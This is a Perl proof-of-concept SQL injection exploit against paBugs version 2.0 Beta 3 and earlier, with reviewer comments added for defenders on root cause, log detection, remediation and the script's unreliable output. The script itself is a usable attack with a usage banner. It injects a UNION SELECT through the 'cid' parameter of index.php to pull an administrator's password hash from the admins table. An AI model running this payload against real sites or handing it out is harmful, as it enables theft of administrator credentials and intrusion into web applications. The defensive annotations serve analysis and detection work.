#!/usr/bin/perl
#
# Proof-of-concept for the SQL injection its banner attributes to
# paBugs <= v2.0 Beta 3. It issues one GET to index.php whose `cid` query
# parameter carries a UNION SELECT against the <prefix>_admins table, then
# prints the first 32-character run found in the response body.
#
# Reviewer notes for defenders:
#   * Root cause (inferred from the payload, not shown on this page): `cid`
#     appears to be concatenated into a quoted SQL string, since the payload
#     starts by closing a quote with `1'`. The fix is to bind `cid` as a
#     parameter or reject anything that is not an integer.
#   * Detection: web-server logs showing index.php requests whose `cid`
#     value contains a single quote, `union`, `select`, or a trailing `/*`.
#   * The script labels the extracted value an MD5 hash. If the application
#     really stores unsalted MD5, treat any logged hit as credential
#     exposure: rotate admin passwords and move to a salted, slow hash.
#   * The output is a loose heuristic (see the comments on the request and
#     the regex below); a printed value is not proof of a vulnerable install,
#     and the script exits with the default status in every branch.
#
use LWP::UserAgent;
use HTTP::Cookies;   # loaded but never referenced in the code shown here

# Four positional arguments are required; otherwise print the banner and stop.
if(@ARGV < 4) { usage(); exit(); }

# All four values are interpolated into the URL below as-is, with no
# validation or URL-encoding.
$host = $ARGV[0]; # Host, scheme included (usage example: http://site.com)
$path = $ARGV[1]; # Path to paBugs directory (usage example: /)
$pref = $ARGV[2]; # prefix for table admins (table read is <prefix>_admins)
$usid = $ARGV[3]; # user id whose `password` column is requested

$www = new LWP::UserAgent;

# The backslashes in `$path\index.php` and `$pref\_admins` only terminate the
# variable names so that $path and $pref interpolate; `\i` and `\_` come out
# as plain `i` and `_`.
# Payload shape: `1'` closes the quoted value, the UNION SELECT places
# `password` in the fourth of five columns, and the trailing `/*` presumably
# comments out the remainder of the application's own query.
$sql = "$host$path\index.php?cid=1'+union+select+1,2,3,password,5+from+$pref\_admins+where+id=$usid/*";
print "\n\n [~] Searching password hash for user with id=$usid \n";

# NOTE(review): LWP::UserAgent::get returns a response object even when the
# request fails, so this `or err()` does not act as a transport or
# HTTP-status check.
$res = $www -> get($sql) or err();

# Takes the first 32-character run of characters from the class anywhere in
# the body. As written the class admits digits, lowercase a-f and commas, so
# a match is not necessarily a password hash.
$res -> content() =~ /([0-9,a-f]{32})/ or err();
print "\n [+] MD5 Hash for user with id=$usid is: $1 \n\n";

# Print the banner: affected product and version as claimed by the author,
# the expected arguments, and one example invocation.
sub usage()
{
    print "+---------------------------------------------------------+\n";
    print "| .: Cold Fear Team :. |\n";
    print "+---------------------------------------------------------+\n";
    print "| paBugs <= v2.0 Beta 3 Sql-Injection exploit |\n";
    print "| Usage: pabugs_cft.pl <site> <folder> <prefix> <user_id> |\n";
    print "| e.g.: pabugs_cft.pl http://site.com / bt 1 |\n";
    print "| Coded by p-range // cf-team.net // p-range.info |\n";
    print "+---------------------------------------------------------+\n";
}

# Report that no 32-character match was found, then exit. The message only
# reflects the regex result; it does not establish that the target is patched.
sub err()
{
    print "\n [-] Engine is NOT vulnerably";
    exit();
}